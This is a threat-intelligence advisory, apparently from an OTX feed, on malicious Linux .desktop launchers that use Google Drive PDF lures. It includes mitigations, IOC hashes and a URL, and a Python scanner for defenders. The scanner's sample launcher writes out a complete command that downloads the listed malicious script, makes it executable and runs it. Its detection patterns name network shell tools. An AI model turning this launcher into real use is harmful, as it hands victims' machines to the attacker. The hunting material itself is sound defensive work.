
Actionable threat hunting with Threat Intelligence (I) - Hunting malicious desktop files

Severity: Medium
Published: Fri May 16 2025 (05/16/2025, 08:22:12 UTC)
Source: AlienVault OTX

Description

This analysis explores the detection of malicious .desktop files used by threat actors to infect Linux systems. It explains the structure of these files and how they are manipulated to hide malicious content. The report details the execution flow of these files, which typically open a PDF hosted on Google Drive as a distraction while the malware is downloaded in the background. Various threat hunting techniques are presented, including searching for specific processes, command lines and file contents, and the article provides several Google Threat Intelligence queries for identifying suspicious .desktop files and related malicious activity. It also includes a list of recently discovered samples potentially linked to a campaign reported by Zscaler.

AI-Powered Analysis

Last updated: 06/19/2025, 18:16:42 UTC

Technical Analysis

This threat involves the use of malicious .desktop files to compromise Linux systems. A .desktop file is a desktop entry (the freedesktop.org Desktop Entry Specification) that desktop environments such as GNOME, KDE and Xfce read to build launchers: its Name and Icon keys decide what the user sees, and its Exec key is the command line run when the entry is opened. Because the file manager renders the entry from those keys rather than from the file's real name, a launcher can be made to look like a PDF while its Exec line runs an arbitrary shell command.

Threat actors manipulate these files to embed obfuscated commands that execute malware when the user opens them. A common tactic observed is to have the launcher open a seemingly benign PDF hosted on Google Drive as a social engineering lure while, in the background, the same command line downloads and executes the malware, so the user sees only the document they expected. The obfuscation complicates detection: the malicious Exec line is hidden within otherwise legitimate-looking desktop entry syntax, and most current desktop environments will still run it once the file carries the executable bit and the user accepts any trust prompt.

No software vulnerability is exploited and there is nothing to patch: the technique abuses launcher behaviour that desktop environments provide by design, which is why the pulse records no exploits in the wild even though the campaign appears to be ongoing, with recently discovered samples linked to a Zscaler-reported campaign. The threat primarily targets Linux desktop users, leveraging ordinary user behaviour and a trusted cloud service, Google Drive, to facilitate infection.

The report outlines threat hunting methodologies for this tradecraft: searching for suspicious process names and command-line arguments, such as a launcher spawning a shell that fetches a remote script, and for file content patterns characteristic of these .desktop files. It also provides Google Threat Intelligence queries to identify such files and related malicious activity.

Potential Impact

For European organizations, this threat poses a moderate risk, primarily to endpoints running Linux desktop environments, which are common in research institutions, software development firms and government agencies. A successful infection gives the attacker code execution as the logged-in user, which can lead to data exfiltration, further system compromise or lateral movement within the network. The use of Google Drive-hosted PDFs as the lure increases the likelihood that a user interacts with the file. While the campaign exploits no known vulnerability or zero-day, its obfuscation and stealthy execution can delay detection and response, and its use of a legitimate cloud service complicates network-based detection, since the lure traffic blends in with normal Google Drive use and can pass perimeter defences. Organizations that rely on Linux desktops for critical operations may face disruption or confidentiality breaches if infected. The medium severity reflects the balance between the targeted, user-interaction-dependent nature of the attack and the impact of a successful compromise.

Mitigation Recommendations

To mitigate this threat effectively, European organizations should implement controls aimed at launcher abuse, beyond generic Linux hardening.

Constrain where launchers can run from. Desktop environments only execute a .desktop file that carries the executable bit, so keep that bit off launchers outside package-managed directories and alert when a .desktop file in a home directory (Desktop, Downloads, ~/.local/share/applications) or in an autostart directory (~/.config/autostart, /etc/xdg/autostart) is created, modified or made executable. Audit such files for the traits the report describes: an Exec line that invokes a shell to download or decode something, a Name or Icon that imitates a document, and obfuscation that hides the Exec line inside otherwise ordinary desktop entry syntax.

Deploy endpoint detection and response (EDR) tooling that can parse .desktop files and follow their execution chains. The pattern to alert on is a document viewer launched from a .desktop file together with a shell process that makes outbound connections, or a connection to cloud storage such as Google Drive followed immediately by a download from an unfamiliar host. Integrate hunting queries like those in the report into the SIEM to proactively identify indicators of compromise, including the hashes and URL published with this pulse.

User awareness training should stress that a file that looks like a document can be a launcher, and that unsolicited or unexpected desktop shortcuts and documents, especially ones that open cloud-hosted files, should not be opened. Network segmentation limits the spread of malware if an endpoint is compromised. Consider application allow-listing or sandboxing for launcher execution to block unauthorized code. Keep Linux desktop environments and associated software patched to reduce the attack surface, even though this campaign exploits no specific vulnerability.
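The file-content hunting described in the technical analysis and the launcher audit recommended above can be combined into a host-side scanner. The following is an added example written for this page, not the pulse's or Google Threat Intelligence's tooling. It parses .desktop files the way a desktop environment does (key=value lines of the first [Desktop Entry] group), applies heuristics that are assumptions about what these launchers look like rather than published rules (a document-like Name or Icon paired with a shell-running Exec, a download tool or decoder in Exec, a Google Drive link opened next to other commands, heavy comment padding), checks each file's MD5, SHA-1 and SHA-256 against the hashes in the IOC list and its Exec line against the IOC URL, and runs itself over two constructed sample launchers. The regexes, the padding threshold and the sample contents are illustrative.

```python
#!/usr/bin/env python3
"""Scan .desktop launchers for the traits described in the report.

Added example, not the pulse's or Google TI's tooling. The heuristics are
assumptions: a launcher whose Name/Icon mimic a document while Exec runs a
shell that downloads a payload, opens a Google Drive link as a lure, or is
buried under comment padding. The IOC hashes and URL are copied from the pulse.
"""
import hashlib
import re
import tempfile
from pathlib import Path

IOC_HASHES = {  # MD5, SHA-1 and SHA-256 values from the pulse's IOC list
    "5c71c683ff55530c73477e0ff47a1899", "70a0792640bbcae03627de25de3ee42f",
    "040711b2e577fcdba8dc130f72475935893e8471", "1814730cb451b930573c6a52f047301bff0b84d1",
    "8d61ce3651eb070c8cdb76a334a16e53ad865572", "b6170fd0a1a75e043cd412300db4c67a351f71a6",
    "e099572fe108bfba526730dcf87d953c74dcba0d", "eb35be47387605ba194e5422c5f1e99e6968af65",
    "7a2f7357ce5ebd03bbf10b856a30706f71eb1586c309aff9169fb5b056791741",
    "ef2056a6724ad654e3c36234863ab34b9e0e6fa3e6f31340682c37dc2c5cb32e",
}
IOC_URLS = {"https://minio.daviduwu.ovh/public/check.sh"}

# Heuristic patterns (assumptions; tune to your fleet).
SHELL_WRAPPER = re.compile(r"\b(?:ba|da|z)?sh\s+-c\b")
DOWNLOADER = re.compile(r"\b(?:curl|wget|nc|ncat|socat)\b")
DECODER = re.compile(r"base64\s+(?:-d|--decode)|xxd\s+-r|openssl\s+enc")
DRIVE_LURE = re.compile(r"https?://(?:drive|docs)\.google\.com/")
DOCUMENT_NAME = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?)$", re.I)
PADDING_THRESHOLD = 50  # comment lines before we call it padding


def parse_desktop(text):
    """Return (keys of the [Desktop Entry] group, number of '#' comment lines)."""
    keys, comments, in_entry = {}, 0, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("#"):
            comments += 1
        elif line.startswith("["):            # a new group; only the main one matters
            in_entry = line == "[Desktop Entry]"
        elif in_entry and "=" in line:
            key, _, value = line.partition("=")
            keys.setdefault(key.strip(), value.strip())
    return keys, comments


def score_desktop(text):
    """Return a list of findings for one launcher; an empty list means clean."""
    keys, comments = parse_desktop(text)
    exec_line = keys.get("Exec", "")
    doc_like = DOCUMENT_NAME.search(keys.get("Name", "")) or "pdf" in keys.get("Icon", "").lower()
    runs_shell = SHELL_WRAPPER.search(exec_line) or DOWNLOADER.search(exec_line)
    findings = []
    if doc_like and runs_shell:
        findings.append("document lookalike: Name/Icon mimic a document but Exec runs a shell")
    if DOWNLOADER.search(exec_line):
        findings.append("Exec downloads content at launch")
    if DECODER.search(exec_line):
        findings.append("Exec decodes an embedded payload")
    if DRIVE_LURE.search(exec_line) and runs_shell:
        findings.append("Google Drive document opened as a lure next to other commands")
    if comments >= PADDING_THRESHOLD:
        findings.append(f"{comments} comment lines pad the file and hide Exec")
    findings += [f"known IOC URL: {u}" for u in sorted(IOC_URLS) if u in exec_line]
    return findings


def ioc_hash_matches(data):
    """MD5/SHA-1/SHA-256 of the file bytes, intersected with the published hashes."""
    digests = {hashlib.new(algo, data).hexdigest() for algo in ("md5", "sha1", "sha256")}
    return digests & IOC_HASHES


def scan_tree(root):
    """Score every *.desktop below root; return [(path, findings)] for files with hits."""
    hits = []
    for path in sorted(Path(root).rglob("*.desktop")):
        data = path.read_bytes()
        findings = score_desktop(data.decode("utf-8", "replace"))
        findings += [f"hash matches pulse IOC: {h}" for h in sorted(ioc_hash_matches(data))]
        if findings:
            hits.append((path, findings))
    return hits


# Constructed samples: a stock browser launcher and a launcher built the way the
# report describes (the URL is the one from the IOC list; everything else is made up).
BENIGN = "[Desktop Entry]\nType=Application\nName=Firefox\nExec=firefox %u\nIcon=firefox\nTerminal=false\n"
MALICIOUS = "#\n" * 120 + (
    "[Desktop Entry]\nType=Application\nName=Invoice_Q2.pdf\nIcon=application-pdf\nTerminal=false\n"
    'Exec=bash -c "curl -fsSL https://minio.daviduwu.ovh/public/check.sh -o /tmp/.x; '
    'chmod +x /tmp/.x; /tmp/.x & xdg-open https://drive.google.com/file/d/EXAMPLE_ID/view"\n'
)


def demo():
    """Write the two samples into a scratch directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "firefox.desktop").write_text(BENIGN)
        Path(tmp, "Invoice_Q2.desktop").write_text(MALICIOUS)
        return [(p.name, f) for p, f in scan_tree(tmp)]


if __name__ == "__main__":
    for name, findings in demo():
        print(name)
        for finding in findings:
            print("  -", finding)
```

Point scan_tree() at the directories worth watching (home directories, ~/.local/share/applications, ~/.config/autostart, /etc/xdg/autostart). Legitimate launchers that wrap their command in sh -c will trigger the shell heuristic on their own, so treat the findings as hunting leads to triage rather than verdicts; a hash or URL match is the only finding here that ties a file directly to the pulse.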


Technical Details

Author: AlienVault
TLP: WHITE
References: none listed
Adversary: not named
Indicators of Compromise

URL

Value                                        Description
https://minio.daviduwu.ovh/public/check.sh   (none given)

Hash

Type     Value                                                             Description
MD5      5c71c683ff55530c73477e0ff47a1899                                  MD5 of b6170fd0a1a75e043cd412300db4c67a351f71a6
MD5      70a0792640bbcae03627de25de3ee42f                                  MD5 of 040711b2e577fcdba8dc130f72475935893e8471
SHA-1    040711b2e577fcdba8dc130f72475935893e8471
SHA-1    1814730cb451b930573c6a52f047301bff0b84d1
SHA-1    8d61ce3651eb070c8cdb76a334a16e53ad865572
SHA-1    b6170fd0a1a75e043cd412300db4c67a351f71a6
SHA-1    e099572fe108bfba526730dcf87d953c74dcba0d
SHA-1    eb35be47387605ba194e5422c5f1e99e6968af65
SHA-256  7a2f7357ce5ebd03bbf10b856a30706f71eb1586c309aff9169fb5b056791741  SHA-256 of b6170fd0a1a75e043cd412300db4c67a351f71a6
SHA-256  ef2056a6724ad654e3c36234863ab34b9e0e6fa3e6f31340682c37dc2c5cb32e  SHA-256 of 040711b2e577fcdba8dc130f72475935893e8471

The Type column is inferred from digest length (32, 40 and 64 hex characters); the Description column is as published in the pulse. Two of the SHA-1 values (b6170fd0… and 040711b2…) are the files whose MD5 and SHA-256 digests are also listed.

Threat ID: 682c992c7960f6956616a5d6

Added to database: 5/20/2025, 3:01:00 PM

Last enriched: 6/19/2025, 6:16:42 PM

Last updated: 7/23/2025, 9:33:46 AM
